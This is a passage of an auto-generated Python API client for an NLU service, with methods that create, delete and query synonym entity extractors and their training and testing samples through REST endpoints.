def synonym_entity_extractor_create_with_http_info(self, create_details, **kwargs): # noqa: E501
"""Create a synonym entity extractor. # noqa: E501
Create a new synonym entity extractor or reload one from the trash. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_create_with_http_info(create_details, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SynonymEntityExtractorCreateDetails create_details: The details of the instance to create. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_details', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_create" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_details' is set
if ('create_details' not in params or
params['create_details'] is None):
raise ValueError("Missing the required parameter `create_details` when calling `synonym_entity_extractor_create`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'create_details' in params:
body_params = params['create_details']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SynonymEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_del(self, instance_name, **kwargs): # noqa: E501
"""Delete named instance. # noqa: E501
Delete and get the details of the named synonym entity extractor instance. Deleted models can be reloaded from the trash with the create operation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_del_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_del_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_del_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Delete named instance. # noqa: E501
Delete and get the details of the named synonym entity extractor instance. Deleted models can be reloaded from the trash with the create operation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_del" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_del`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SynonymEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_del_testing_samples(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Delete testing samples. # noqa: E501
Delete the listed testing samples of the named extractor. Returns the deleted samples. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_testing_samples(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_del_testing_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_del_testing_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_del_testing_samples_with_http_info(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Delete testing samples. # noqa: E501
Delete the listed testing samples of the named extractor. Returns the deleted samples. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_testing_samples_with_http_info(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'synonym_sample_list', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_del_testing_samples" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_del_testing_samples`") # noqa: E501
# verify the required parameter 'synonym_sample_list' is set
if ('synonym_sample_list' not in params or
params['synonym_sample_list'] is None):
raise ValueError("Missing the required parameter `synonym_sample_list` when calling `synonym_entity_extractor_del_testing_samples`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'synonym_sample_list' in params:
body_params = params['synonym_sample_list']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/testing_samples', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_del_testing_samples_all(self, instance_name, **kwargs): # noqa: E501
"""Delete all testing samples. # noqa: E501
Delete all testing samples of the named extractor. Returns the deleted samples. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_testing_samples_all(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_del_testing_samples_all_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_del_testing_samples_all_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_del_testing_samples_all_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Delete all testing samples. # noqa: E501
Delete all testing samples of the named extractor. Returns the deleted samples. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_testing_samples_all_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_del_testing_samples_all" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_del_testing_samples_all`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/testing_samples_all', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_del_training_samples(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Delete training samples. # noqa: E501
Delete the listed training samples of the named extractor. Returns the deleted samples. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_training_samples(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_del_training_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_del_training_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_del_training_samples_with_http_info(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Delete training samples. # noqa: E501
Delete the listed training samples of the named extractor. Returns the deleted samples. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_training_samples_with_http_info(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'synonym_sample_list', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_del_training_samples" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_del_training_samples`") # noqa: E501
# verify the required parameter 'synonym_sample_list' is set
if ('synonym_sample_list' not in params or
params['synonym_sample_list'] is None):
raise ValueError("Missing the required parameter `synonym_sample_list` when calling `synonym_entity_extractor_del_training_samples`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'synonym_sample_list' in params:
body_params = params['synonym_sample_list']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/training_samples', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_del_training_samples_all(self, instance_name, **kwargs): # noqa: E501
"""Delete all training samples. # noqa: E501
Delete all training samples of the named extractor. Returns the deleted samples. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_training_samples_all(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_del_training_samples_all_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_del_training_samples_all_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_del_training_samples_all_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Delete all training samples. # noqa: E501
Delete all training samples of the named extractor. Returns the deleted samples. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_del_training_samples_all_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_del_training_samples_all" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_del_training_samples_all`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/training_samples_all', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_get_details(self, instance_name, **kwargs): # noqa: E501
"""Get details of named instance. # noqa: E501
Get the details of the named synonym entity extractor instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_details(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_get_details_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_get_details_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_get_details_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Get details of named instance. # noqa: E501
Get the details of the named synonym entity extractor instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_details_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_get_details" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_get_details`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SynonymEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_get_details_all(self, **kwargs): # noqa: E501
"""Get list of synonym entity extractors. # noqa: E501
Get the list of synonym entity extractors. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_details_all(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_caller:
:return: list[SynonymEntityExtractorInstanceDetail]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_get_details_all_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_get_details_all_with_http_info(**kwargs) # noqa: E501
return data
def synonym_entity_extractor_get_details_all_with_http_info(self, **kwargs): # noqa: E501
"""Get list of synonym entity extractors. # noqa: E501
Get the list of synonym entity extractors. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_details_all_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_caller:
:return: list[SynonymEntityExtractorInstanceDetail]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_get_details_all" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymEntityExtractorInstanceDetail]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_get_labels(self, instance_name, **kwargs): # noqa: E501
"""Get list of possible labels. # noqa: E501
Returns the extractor's list of possible entity labels. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_labels(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: list[ClassLabel]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_get_labels_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_get_labels_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_get_labels_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Get list of possible labels. # noqa: E501
Returns the extractor's list of possible entity labels. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_labels_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: list[ClassLabel]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_get_labels" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_get_labels`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/labels', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ClassLabel]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_get_params(self, instance_name, **kwargs): # noqa: E501
"""Get the editable model parameters of named synonym entity extractor. # noqa: E501
Get the editable model parameters of named synonym entity extractor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_params(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: ModelParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_get_params_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_get_params_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_get_params_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Get the editable model parameters of named synonym entity extractor. # noqa: E501
Get the editable model parameters of named synonym entity extractor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_params_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: ModelParams
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_get_params" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_get_params`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/params', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ModelParams', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_get_testing_samples(self, instance_name, **kwargs): # noqa: E501
"""Get testing samples. # noqa: E501
Get the testing samples of the named extractor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_testing_samples(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:param int index: The sample index to start from.
:param int len: The number of samples to return.
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_get_testing_samples_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_get_testing_samples_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_get_testing_samples_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Get testing samples. # noqa: E501
Get the testing samples of the named extractor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_testing_samples_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:param int index: The sample index to start from.
:param int len: The number of samples to return.
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
